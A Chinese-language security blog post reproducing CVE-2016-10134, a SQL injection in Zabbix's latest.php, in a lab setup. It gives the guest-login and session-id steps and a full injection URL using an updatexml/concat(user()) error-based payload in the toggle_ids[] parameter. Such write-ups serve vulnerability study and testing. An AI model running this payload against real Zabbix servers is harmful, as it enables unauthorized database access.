zabbix latest.php SQL注入漏洞


zabbix latest.php SQL注入漏洞(CVE-2016-10134)

zabbix是一款服务器监控软件,其由server、agent、web等模块组成,其中web模块由PHP编写,用来显示数据库中的结果。

漏洞复现

访问 http://your-ip:8080,用账号 guest(密码为空)登录游客账户。

登录后,查看 Cookie 中的 zbx_sessionid,复制后 16 位字符:

将这16个字符作为sid的值,访问 http://your-ip:8080/latest.php?output=ajax&sid=055e1ffa36164a58&favobj=toggle&toggle_open_state=1&toggle_ids[]=updatexml(0,concat(0xa,user()),0),可见成功注入:


文章作者: Geekby
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Geekby !
 上一篇
Wordpress 4.6 任意命令执行漏洞 Wordpress 4.6 任意命令执行漏洞
Wordpress 4.6 任意命令执行漏洞原理参考 https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html 漏洞复现发送如下数据
2019-03-01
下一篇 
Jackson-databind 反序列化漏洞(CVE-2017-7525) Jackson-databind 反序列化漏洞(CVE-2017-7525)
Jackson-databind 反序列化漏洞(CVE-2017-7525)Jackson-databind 支持 Polymorphic Deserialization 特性(默认情况下不开启),当 json 字符串转换的 Target
2019-02-21
  目录